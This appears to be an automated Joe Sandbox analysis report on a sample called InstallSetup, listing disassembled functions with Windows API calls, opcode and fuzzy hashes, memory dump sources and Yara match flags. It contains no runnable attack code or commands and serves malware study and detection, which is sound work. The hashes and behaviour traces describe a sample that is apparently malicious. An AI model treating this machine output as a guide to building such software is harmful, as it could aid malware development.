                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0097BCAB,00970A1C,?,?,?,?,?,00970A1C,?,?,?), ref: 0097B520
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                • Instruction ID: a647100eeaee62fdf3c57a7b21bea0bed2223c4014768f90d5ff18faaaef3207
                                                                                                • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                • Instruction Fuzzy Hash: 1BF0E53B30020957CB089F36DC5576ABF94EFC2754B5A805DEF098B291D7759942C790
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00410672,0094FE60), ref: 009508D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                • Instruction ID: 246578b2d0557cf5b0a65fc35a1e143f1bd25bfd11811e4f2efe0daca7fa198a
                                                                                                • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                • Instruction Fuzzy Hash: 3BD1F63210C1A30ECB2D4AB9847003AFFE56A523A531D479EE4F7CB5C6ED24D954DA60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: c5764a4625c98dcb209072b753dd2c0aac59f0c470dd6ec271d1d3a38ebfcb46
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: 5091647220D0E34EDB2D467E857407FFFE55A523A131A0B9ED4F2CA1C5EE28C569E620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction ID: f7d57be7dc2ee3038b6ae9d424b1b1cfe041d212c138d6e12ab30ca128035453
                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: F291947210C0E34EDB69467E853843FFFE55A527A131A0B9EE4F2CA1D5FE24C564E620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: b44f4b77b3939d2b51fdd2b8bb386af113c9d168fbb35ad13dbcccafd4a0dc8b
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: 6E91967210C0A30EDB2A46BD853443EFFE55E513A931A0BDED4F2CB1D5EE29C954DA20
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                • Instruction ID: 44c79e78095e1488f8de3dd1fe8613cf40767fd9c688572c5ccac37bcc8ecc7f
                                                                                                • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                • Instruction Fuzzy Hash: 60618BB1F0370957EB386A2C8C99BBE639CDF95740F18081AE8B2DF2C1D619DD418396
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: d4316a2c24ecae29a937d76a7ed0d7ce7e47fbf40562a08f011a6c44f581251a
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: AF81567220D0E34DDB6946BD857403EFFE55B523A931A0B9ED4F2CB2C5EE18CA54E620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: 77b417697b5940ce1fb3a44eaedf89360556a161170b2e1e83cccc52beb11c03
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: 991120B724004247D664C63ED8B45BBE79DEBCA3207BD477AD0614B758DF32D944E640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c00000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                • Instruction ID: f00c8918fc2aa6738e5f2c24d59fc603ba2f6fa4a6945101825310feb89c5dd4
                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                • Instruction Fuzzy Hash: 1211CE72340101AFD750CF95DC81FA673EAEB89760B2A8065ED04CB352D679EC42D760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                • Instruction ID: 8068ea80f1d368fdc3dd01e3f72fddacea9dc050a46abd4e245b775ed3158265
                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                • Instruction Fuzzy Hash: 5F018F76A006148FDB21CF64C804FAA33B9EBC6316F4544A5DA0A9B281E774A9458F90
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                • GetDC.USER32(?), ref: 00402151
                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                • _wcslen.LIBCMT ref: 0040227F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                • String ID: Tahoma
                                                                                                • API String ID: 3832963559-3580928618
                                                                                                • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                • ReleaseCapture.USER32 ref: 004025F2
                                                                                                • GetDC.USER32(00000000), ref: 00402619
                                                                                                • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                • DestroyWindow.USER32(?), ref: 00402754
                                                                                                • SetCapture.USER32(?), ref: 004027A1
                                                                                                • GetDC.USER32(00000000), ref: 004027D5
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                • String ID: gya
                                                                                                • API String ID: 2545303185-1989253062
                                                                                                • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                • Instruction ID: a52276952407edf0aef2268696d0951df30aad4b0f87727beb6a5f895dda5566
                                                                                                • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                • Instruction Fuzzy Hash: C4B18FB5900209AFDF11DF78C882BEEBBB8BF49300F14856DF499A7282D77599419B60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0097A8A3
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C0F
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C21
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C33
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C45
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C57
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C69
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C7B
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C8D
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C9F
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CB1
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CC3
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CD5
                                                                                                  • Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CE7
                                                                                                • _free.LIBCMT ref: 0097A898
                                                                                                  • Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
                                                                                                  • Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9
                                                                                                • _free.LIBCMT ref: 0097A8BA
                                                                                                • _free.LIBCMT ref: 0097A8CF
                                                                                                • _free.LIBCMT ref: 0097A8DA
                                                                                                • _free.LIBCMT ref: 0097A8FC
                                                                                                • _free.LIBCMT ref: 0097A90F
